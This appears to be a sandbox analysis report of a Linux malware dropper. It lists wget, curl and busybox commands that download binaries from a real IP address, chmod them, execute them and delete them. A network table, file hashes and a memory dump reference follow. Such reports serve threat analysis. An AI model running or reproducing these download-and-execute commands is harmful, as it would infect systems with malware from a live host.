[wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/bin/chmod

[chmod 777 rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/tmp/rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7

[./rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/bin/rm

[rm rAJcuvlxK6FCe0OqdDIelGh1zCPNCJNWX7]

/usr/bin/wget

[wget http://87.120.126.196/bins/tntI1mR7FaAGCsUFYX3ZtkDXOdfnVZDlF8]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/7pZnePpOV4eOjdR7N3FjZZAlnI3m74qtCP

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/808-1-0xb66cc000-0xb66dd044-memory.dmp